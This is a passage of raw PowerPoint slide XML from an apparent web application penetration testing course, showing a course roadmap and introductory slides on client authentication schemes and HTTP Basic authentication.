            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Analyzing HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SamuraiWTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Penetration Testing Types and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Test Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Reporting and Presenting Findings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Attack Methodology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Types of Flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>JavaScript for Pen Testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Statements, Variables,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Functions, &amp; Events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> The DOM, Methods, and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Properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> AJAX and XMLHttpRequest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> JavaScript Exercise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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1584960"/>
            <a:ext cx="8153400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication identifies the user to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically a username/password combination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Although client-side certificates are available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Five schemes in common use today on the web:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Digest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Integrated Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>OAuth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other more complex schemes exist, but often use these schemes for transportation of authentication information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Biometrics, token, custom client application residing on client, custom mobile code pushed to browser, etc.</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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Basic Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1813560"/>
            <a:ext cx="6400800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RFC 2617 defines modern basic </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
